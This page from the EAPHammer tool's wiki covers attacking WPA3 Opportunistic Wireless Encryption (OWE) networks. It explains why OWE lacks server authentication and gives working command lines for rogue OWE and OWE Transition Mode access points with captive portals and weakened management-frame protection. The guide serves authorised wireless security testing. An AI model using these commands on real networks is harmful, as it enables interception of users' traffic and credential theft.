XV. Attacking Opportunistic Wireless Encryption
Pages 48
EAPHammer Wiki
Home
Setup Guide
Usage Guide
-
I. x.509 Certificate Generation
-
II. Stealing RADIUS Credentials Using EAPHammer
-
III. Stealing AD Credentials Using Hostile Portal Attacks
-
IV. Indirect Wireless Pivots
-
V. Performing Captive Portal Attacks
-
VI. Attacking 802.11n Networks
-
VII. Hardware Modes
-
VIII. Attacking WPA EAP and WPA2 EAP Networks
-
IX. EAPHammer User Database
-
X. ESSID Cloaking
-
XI. Using Karma
-
XII. PMKID Attacks Against WPA PSK and WPA2 PSK Networks
-
XIII. Password Spraying
-
XIV. Cert Wizard
- XIV.1 - Interactive Mode
-
XIV.2 - Creating Certificates
--cert-wizard create -
XIV.3 - Importing Certificates and Keys
--cert-wizard import - XIV.4 - Listing Previously Imported or Created Certificates
--cert-wizard list - XIV.5 - Regenerating Diffie Hellman (DH) Parameters
--cert-wizard dh - XIV.6 - Overriding EAPHammer's Static Configuration
-
XV. Attacking Opportunistic Wireless Encryption
-
XVI. Protected Management Frames
-
XVII. Advanced Granular Controls
Acknowledgements
Clone this wiki locally
Special thanks to Steve Darracott for his help researching this subject: @thedarracott
EAPHammer supports attacks against networks and clients that are configured to use Opportunistic Wireless Encryption (OWE), which is also known as "Enhanced Open". For a theoretical overview of this subject, please refer to the following blog posts:
- https://posts.specterops.io/war-never-changes-attacks-against-wpa3s-enhanced-open-part-1-how-we-got-here-71f5a80e3be7
- https://posts.specterops.io/war-never-changes-attacks-against-wpa3s-enhanced-open-part-2-understanding-owe-90fdc29126a1
- link to part iii here
td;dr - OWE is used to provide encryption capabilities to public wireless networks. You can think of OWE like this - OWE is to open networks as HTTPS is to HTTP. However, unlike HTTPS, OWE does not provide any means of authenticating the identity of what you're connecting to (HTTPS uses server certs). This means that it can be compromised using Person-In-the-Middle (PITM) attacks. From an operational standpoint, this means that you can execute rogue AP attacks against OWE in the same way you would against open networks.
To create a rogue access point that uses OWE, just pass the --auth owe flag as shown in the following example:
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal
Note that by default, eaphammer will conform to RFC 8110 by requiring stations to use Protected Management Frames (PMF) when --auth owe is used. You are free to tell eaphammer to violate RFC 8110 by making PMF enabled but not required:
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf enable
Should you wish to commit an even more egregious RFC violation, you can disable PMF completely as well:
./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf disable
OWE Transition Mode
EAPHammer also supports attacks against OWE Transition Mode. To create a rogue AP that uses OWE Transition Mode, use the --auth owe-transition as shown in the following example:
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal
By default, eaphammer will conform to RFC 8110 by enabling but not requiring PMF when --auth owe-transition is used. You are free to tell eaphammer to violate RFC 8110 by making PMF required:
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf require
Alternatively, you can disable PMF completely:
./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf disable